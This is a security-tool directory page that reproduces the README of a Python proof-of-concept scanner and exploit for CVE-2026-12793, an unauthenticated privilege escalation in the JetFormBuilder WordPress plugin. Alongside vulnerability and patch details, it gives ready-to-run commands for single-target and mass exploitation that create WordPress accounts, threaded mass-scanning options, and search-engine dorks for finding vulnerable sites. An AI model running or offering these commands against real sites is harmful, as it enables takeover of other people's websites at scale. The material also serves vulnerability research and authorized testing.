Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-12793 — Python PoC scanner and exploit for CVE-2026-12793, an unauthenticated privilege escalation in JetFormBuilder <=3.6.2 that creates WordPress admin accounts. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-12793
Privilege EscalationReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHub
511920 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
murrez/cve-2026-12793

CVE-2026-12793

Python PoC scanner and exploit for CVE-2026-12793, an unauthenticated privilege escalation in JetFormBuilder <=3.6.2 that creates WordPress admin accounts.

View Repository

CVE-2026-12793 — JetFormBuilder Unauthenticated Privilege Escalation

Proof-of-concept scanner and exploit for CVE-2026-12793 in the WordPress plugin JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Affected≤ 3.6.2
Fixed in3.6.2.1+
CVSS9.8 Critical
AuthUnauthenticated
CWECWE-269 — Improper Privilege Management
Researcherdaroo (Wordfence)

Vulnerability

The plugin does not verify that _jet_engine_booking_form_id refers to a published jet-form-builder custom post type before loading the referenced post's block content as form schema and executing post-submit actions.

An unauthenticated attacker can submit a crafted AJAX request to trigger the Register User action (wp_insert_user) and create a new WordPress account. If the target form is misconfigured with an elevated role (e.g. administrator), this leads to full site takeover.

Attack flow

1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Patch (3.6.2.1)

  • Block_Helper::is_valid_form_post() — only published jet-form-builder CPT accepted
  • Form_Handler::set_form_id() rejects invalid form IDs
  • SSR validation hardening (wp_insert_user / wp_update_user blocked as callbacks)

Requirements

  • Python 3.8+
  • requests
pip install requests urllib3

Usage

Single target — check

python poc.py -u https://target.example --mode check

Mass scan

python poc.py --list domains.txt --mode check --threads 30 --quiet

Input formats: one domain/URL per line, FOFA CSV (host,domain), or candidates.jsonl from a previous run.

Exploit (single target)

python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Mass exploit from candidates

python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Options

FlagDescription
-u, --urlSingle target URL
--listTarget list file
--modecheck (default) or exploit
--form-idKnown JetFormBuilder form post ID
--page-urlPage embedding the form (referer), e.g. /register/
--fieldsField map: login=x,email=y,password=z
--pathsExtra paths to crawl for forms
--username / --email / --passwordCredentials for exploit (random if omitted)
--verifyVerify account via wp-login.php after submit
-j, --threadsWorker threads (default: 20)
--timeoutHTTP timeout in seconds (default: 20)
--proxyHTTP(S) proxy URL
--outputFull JSONL log (default: cve_2026_12793_results.jsonl)
--vuln-listHit list (default: hits.txt)
--candidates-listCandidate JSONL (default: candidates.jsonl)
-q, --quietProgress output only

Output files

FileContent
hits.txtVulnerable / exploited target URLs
candidates.jsonlTargets with reachable Register User probe (form_id, page_url, fields)
cve_2026_12793_results.jsonlFull per-target JSON results

Example candidate entry

{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Auto-detected field names are heuristic. Always verify and override with --fields before exploit.

Detection / FOFA dorks

body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Version check:

/wp-content/plugins/jetformbuilder/readme.txt

Look for Stable tag: ≤ 3.6.2.

References

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse.

License

MIT

Download Tool